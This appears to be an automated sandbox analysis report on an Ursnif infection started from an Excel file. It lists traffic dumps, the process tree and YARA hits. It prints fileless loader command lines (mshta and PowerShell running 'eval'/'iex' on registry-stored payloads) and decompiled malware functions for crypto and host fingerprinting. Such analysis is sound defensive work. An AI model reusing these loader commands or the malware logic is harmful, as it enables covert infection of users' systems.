33 4a 41 8a fa 96 e1 24 a3 e1 7a e1 d1 d7 91 95 e0 95 04 c3 b5 2d 79 47 2d d5 57 f3 4f 68 61 59 da ee cf ad b3 23 f4 31 d2 45 22 cb 27 ba 76 96 12 d2 9d 10 6d 90 c0 10 f3 29 f3 6b c8 f0 f9 3b 96 5f ff 90 b7 4d df f8 78 51 68 86 68 44 11 58 3a d7 1f 24 8b af 13 f3 00 42 f1 ec 9d 0c b6 5d a2 cd 82 9a 52 29 06 76 8a 04 fc 3a 52 0b df 33 ba af 79 b2 a9 6e eb 03 13 ab 0e 3e 7d 8d 7d 84 12 21 a3 15 0c 5f e8 2c 94 ee 45 73 61 6e 9d 43 02 20 f1 82 62 08 1a 30 3e 95 94 1c eb 9b e2 bf f5 a5 40 b8 22 77 75 b0 c6 53 4d 2a 24 74 63 cd d3 4c 88 01 bc ef 5d b4 56 fb 75 94 59 58 25 06 9c e0 1c a8 e1 32 9e 70 49 5f ee fa ee ca 6a 73 82 03 62 fb f7 45 4f e5 b3 67 5a ab 29 fb 83 c9 88 06 2e eb 94 84 46 66 2c fc 30 98 58 b2 6b 95 12 94 c0 5f 1c 79 73 f4 14 7d f9 04 64 87 00 5b b1 81 b0 fe 22 0a aa 9c f0 e2 0f 4f bb 27 4d 94 ff e6 b8 ee 1e b7 4e e3 36 93 f4 e2 55 f6 86 58 12 67 2b 84 72 d8 7d 27 2d 04 6f d8 0c 90 de 83 f7 b3 de ba 9c 64 11 8d 40 31 ec 9c 34 65 1b 44 41 fe ef 80 f9 49 5f 4d 06 f2 b5 ff 74 2b a3 c1 b6 d8 88 05 09 45 ba a4 b5 31 96 0b 98 98 36 fb de fb 2f 8f 8f d2 a9 0c 3f 49 d2 52 68 d4 5f b4 eb 2f 1c bb bf 7e e0 f9 6a d7 b7 cc e3 f6 8e 5e c5 48 8b 39 47 52 7e 3f aa 1f d7 4a 72 8c ab d8 91 6d 57 5e ff f0 c9 0a 2d d5 9a 76 83 20 31 c9 ec cc 66 e4 cd a9 25 94 57 6c 9d 14 ba 36 3e 24 bc c2 03 5e ab 5d 43 ad 27 68 cb 24 37 4d 33 a2 e1 71 53 b6 86 50 2c b5 55 9a ad 7c 2e 51 f2 08 b9 ae 6a d9 9e 72 07 77 77 bf 86 3c 5f 2a 3d 93 e2 e1 79 d8 c4 ca 04 de 34 13 dd c2 76 26 50 69 65 5d 03 6c d9 18 da a4 1c 1c 3f bd f9 5b 33 49 4e 66 2a c0 b7 22 d2 8b c0 fb 8e 6c 5f 22 5f 6d 6d 23 99 d6 f8 9f 4f 70 f5 20 ba 6b 91 4c ad 5b cb 1f 3e 77 da e8 67 1f 6f 36 d7 58 09 80 76 14 ba c8 f8 b7 8b ab be 55 58 8c ab 10 d1 66 f0 fe af 9d 98 fb b8 7c 38 a6 1a 53 a3 ff 47 fd 2f b3 4b b3 cc d9 e1 11 19 c9 14 4b da 2a 20 7a 0c 9f 6d b5 5d 3c 98 62 46 99 99 99 fb 95 e8 63 00 4b ce 81 26 0a 2e 2c 2c 35 a2 c8 b8 96 fa 21 09 4d 61 bd 4d ab 7c a1 2c 5c c5 32 3b 24 05 71 5f 06 1f 67 a5 17 cc af a7 98 e7 cd fa da f2 e9 6c c7 c3 ef a2 e0 e2 af e6 fc 6a 77 36 2b 69 f7 01 63 41 e7 ab 1b b3 7b 7e a8 e8 0a ab b3 dd 5c d3 38 74 b3 41 ac e8 8d 49 6d b0 9b 0e 9d 6f 1b c2 d4 44 0e a5 1b 6b a2 e3 a4 e7 2b 0b d3 c1 a5 31 77 2b 42 66 ef 98 f9 0b 33 c8 b6 36 91 a7 ea aa 7b 94 96 88 74 49 c3 12 99 50 ec cb e8 6e 28 59 65 b9 ad Data Ascii: 76fEPDkl4N\|d;@FT>->G2WxP7;T.-@n9!qp\/I%2:~SPc44Bro:lTEN02#uoi'YIGJ5Id3SjehXS5l^Q9kt^xE(,W1DtYlq8T3JA$z-yG-WOhaY#1E"'vm)k;_MxQhhDX:$B]R)v:R3yn>}}!_,EsanC b0>@"wuSM$tcL]VuYX%2pI_jsbEOgZ).Ff,0Xk_ys}d["O'MN6UXg+r}'-od@14eDAI_Mt+E16/?IRh_/~j^H9GR~?JrmW^-v 1f%Wl6>$^]C'h$7M3qSP,U\|.Qjrww<_=y4v&Pie]l?[3INf"l_"_mm#Op kL[>wgo6XvUXf\|8SG/KK zm]<bFcK&.,,5!MaM\|,\2;$q_gljw6+icA{~\8tAImoDk+1w+Bf36{tIPn(Ye
Jul 8, 2021 15:47:40.508295059 CEST	7946	IN	Data Raw: 4e 40 b8 b6 e4 aa 05 63 95 07 c9 33 53 9f 63 82 f2 b4 39 26 74 46 40 8a 29 62 40 db a9 e1 9a fa fe 47 82 e5 e4 3a 9e 32 6f fb 1d 5c cb 27 c7 22 9f 7a 7f 9e 43 32 dc 08 d6 bb f9 22 d0 7e 68 04 d7 6a a6 c2 b5 db 54 8f ae 93 c7 32 e7 5d 03 d5 fe 34 Data Ascii: N@c3Sc9&tF@)b@G:2o\'"zC2"~hjT2]4NS)Men\|b]Z1JXg]N-2 ^8"V_%.$:C8Lv.ivF4&NI]90AD,iaw1$p5o.d$

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jul 8, 2021 15:45:12.935718060 CEST	162.241.253.78	443	192.168.2.3	49725	CN=www.free.mynowministries.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US	CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Tue Jun 15 19:07:00 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021	Mon Sep 13 19:06:59 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
					CN=R3, O=Let's Encrypt, C=US	CN=ISRG Root X1, O=Internet Security Research Group, C=US	Fri Sep 04 02:00:00 CEST 2020	Mon Sep 15 18:00:00 CEST 2025
					CN=ISRG Root X1, O=Internet Security Research Group, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Jan 20 20:14:03 CET 2021	Mon Sep 30 20:14:03 CEST 2024

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 5056 Parent PID: 792

General

Start time:	15:45:08
Start date:	08/07/2021
Path:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase:	0x3f0000
File size:	27110184 bytes
MD5 hash:	5D6638F2C8F8571C593999C58866007E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2576 Parent PID: 5056

General

Start time:	15:45:13
Start date:	08/07/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32 -s C:\Users\Public\Documents\decrypt.dll
Imagebase:	0xfc0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.411957077.0000000004E08000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.411794580.0000000004E08000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.411858229.0000000004E08000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.411885260.0000000004E08000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.472132410.0000000004B0E000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.411972809.0000000004E08000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.429184025.0000000004C0C000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.428651984.0000000004D89000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.411764136.0000000004E08000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.411824879.0000000004E08000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.411905435.0000000004E08000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 5236 Parent PID: 5056

General

Start time:	15:46:33
Start date:	08/07/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32 -s C:\Users\Public\Documents\decrypt.dll
Imagebase:	0xfc0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.508793933.0000000005738000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.508759247.0000000005738000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.508819476.0000000005738000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.508778168.0000000005738000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.531333562.000000000553C000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.508710785.0000000005738000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.520271501.00000000056B9000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.508809489.0000000005738000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.508736134.0000000005738000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.508679200.0000000005738000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5008 Parent PID: 792

General

Start time:	15:46:43
Start date:	08/07/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff6ab5e0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 4700 Parent PID: 5008

General

Start time:	15:46:44
Start date:	08/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5008 CREDAT:17410 /prefetch:2
Imagebase:	0xb40000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5500 Parent PID: 792

General

Start time:	15:47:28
Start date:	08/07/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff6ab5e0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5944 Parent PID: 5500

General

Start time:	15:47:29
Start date:	08/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17410 /prefetch:2
Imagebase:	0xb40000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 4716 Parent PID: 5500

General

Start time:	15:47:31
Start date:	08/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17416 /prefetch:2
Imagebase:	0xb40000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5740 Parent PID: 5500

General

Start time:	15:47:34
Start date:	08/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:82956 /prefetch:2
Imagebase:	0xb40000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 1720 Parent PID: 5500

General

Start time:	15:47:36
Start date:	08/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17428 /prefetch:2
Imagebase:	0xb40000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: mshta.exe PID: 3128 Parent PID: 3388

General

Start time:	15:47:43
Start date:	08/07/2021
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Copx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Copx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Imagebase:	0x7ff6dddb0000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: mshta.exe PID: 5780 Parent PID: 3388

General

Start time:	15:47:44
Start date:	08/07/2021
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Hl1h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Hl1h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Imagebase:	0x7ff6dddb0000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: powershell.exe PID: 3936 Parent PID: 3128

General

Start time:	15:47:45
Start date:	08/07/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Imagebase:	0x7ff785e30000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: conhost.exe PID: 5748 Parent PID: 3936

General

Start time:	15:47:45
Start date:	08/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: powershell.exe PID: 5196 Parent PID: 5780

General

Start time:	15:47:46
Start date:	08/07/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Imagebase:	0x7ff785e30000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: conhost.exe PID: 5164 Parent PID: 5196

General

Start time:	15:47:46
Start date:	08/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: csc.exe PID: 5304 Parent PID: 3936

General

Start time:	15:47:57
Start date:	08/07/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline'
Imagebase:	0x7ff62b250000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: csc.exe PID: 1364 Parent PID: 5196

General

Start time:	15:47:57
Start date:	08/07/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.cmdline'
Imagebase:	0x7ff62b250000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: regsvr32.exe PID: 2576 Parent PID: 5056 regsvr32.exeCOMMON

Executed Functions

Function 001E39C5, Relevance: 19.7, APIs: 13, Instructions: 163
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E001E39C5(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				BYTE* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				int _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				BYTE* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x1ea0dc( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x1ea0b8() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E001E6837(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x1ea0d4(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 =  &(_t102[_t90]);
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E001E50CA(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}

0x001e39ce
0x001e39d4
0x001e39d7
0x001e39dd
0x001e39dd
0x001e39df
0x001e39e1
0x001e39e4
0x001e39ea
0x001e39eb
0x001e39ec
0x001e39f2
0x001e39f7
0x001e39fd
0x001e3a05
0x001e3b62
0x001e3a0b
0x001e3a0d
0x001e3a16
0x001e3a1b
0x001e3a2d
0x001e3a30
0x001e3a34
0x001e3a3b
0x001e3a3f
0x001e3a47
0x001e3b4d
0x001e3a4d
0x001e3a4d
0x001e3a51
0x001e3a52
0x001e3a54
0x001e3a5f
0x001e3b39
0x001e3a65
0x001e3a65
0x001e3a68
0x001e3a6e
0x001e3a74
0x001e3a74
0x001e3a7c
0x001e3a80
0x001e3a83
0x001e3b2a
0x001e3a89
0x001e3a8f
0x001e3a92
0x001e3a95
0x001e3a97
0x001e3a9a
0x001e3a9d
0x001e3a9f
0x001e3a9f
0x001e3aa9
0x001e3aae
0x001e3ab1
0x001e3ab4
0x001e3ab6
0x001e3abf
0x001e3ae9
0x001e3ac1
0x001e3ad2
0x001e3ad2
0x001e3af1
0x00000000
0x00000000
0x001e3af3
0x001e3af6
0x001e3af9
0x001e3afd
0x00000000
0x001e3aff
0x001e3b0e
0x001e3b14
0x001e3b1c
0x001e3b1c
0x00000000
0x001e3afd
0x001e3b01
0x001e3b09
0x001e3b0c
0x001e3b23
0x00000000
0x00000000
0x00000000
0x001e3b0c
0x001e3a83
0x001e3b3c
0x001e3b3f
0x001e3b3f
0x001e3b54
0x001e3b54
0x001e3b6c

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,001E4A23,00000001,001E70D9,00000000), ref: 001E39FD
memcpy.NTDLL(001E4A23,001E70D9,00000010,?,?,?,001E4A23,00000001,001E70D9,00000000,?,001E62B1,00000000,001E70D9,?,00000000), ref: 001E3A16
CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 001E3A3F
CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 001E3A57
memcpy.NTDLL(00000000,00000000,04E09630,00000010), ref: 001E3AA9
CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,04E09630,00000020,?,?,00000010), ref: 001E3AD2
CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,04E09630,?,?,00000010), ref: 001E3AE9
GetLastError.KERNEL32(?,?,00000010), ref: 001E3B01
GetLastError.KERNEL32 ref: 001E3B33
CryptDestroyKey.ADVAPI32(00000000), ref: 001E3B3F
GetLastError.KERNEL32 ref: 001E3B47
CryptReleaseContext.ADVAPI32(?,00000000), ref: 001E3B54
GetLastError.KERNEL32(?,?,?,001E4A23,00000001,001E70D9,00000000,?,001E62B1,00000000,001E70D9,?,00000000,001E70D9,00000000,04E09630), ref: 001E3B5C

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
String ID:
API String ID: 1967744295-0
Opcode ID: 59dcab0ca216cdd2721f583d147faaf4827bad149685b1aede063b4b8a7c2008
Instruction ID: a549eb375e33d0e2646fa47a0df470f224db49f9fe36dea834ec808a9b39927b
Opcode Fuzzy Hash: 59dcab0ca216cdd2721f583d147faaf4827bad149685b1aede063b4b8a7c2008
Instruction Fuzzy Hash: 53514A71900688FFDB10DFAADC88AAEBBB9EB44350F108425F912E7250D7719E54DB61

Uniqueness

Uniqueness Score: -1.00%

Function 001E4454, Relevance: 12.1, APIs: 8, Instructions: 102
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E001E4454(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x1ea2c8; // 0xbd092303
					_v12 = _t59;
				}
				_t64 = _t69;
				E001E143F( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x1ea2d0 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x1ea290, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E001E283A(_v8 + _v8, _t63);
							}
							HeapFree( *0x1ea290, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x1ea290, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E001E283A(_v8 + _v8, _t63);
						}
						HeapFree( *0x1ea290, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}

0x001e4454
0x001e445c
0x001e4462
0x001e4465
0x001e4468
0x001e446a
0x001e446f
0x001e446f
0x001e4475
0x001e4477
0x001e4484
0x001e44e5
0x001e4486
0x001e448b
0x001e4491
0x001e4496
0x001e44a4
0x001e44a8
0x001e44b7
0x001e44be
0x001e44c5
0x001e44c5
0x001e44d0
0x001e44d0
0x001e44a8
0x001e4496
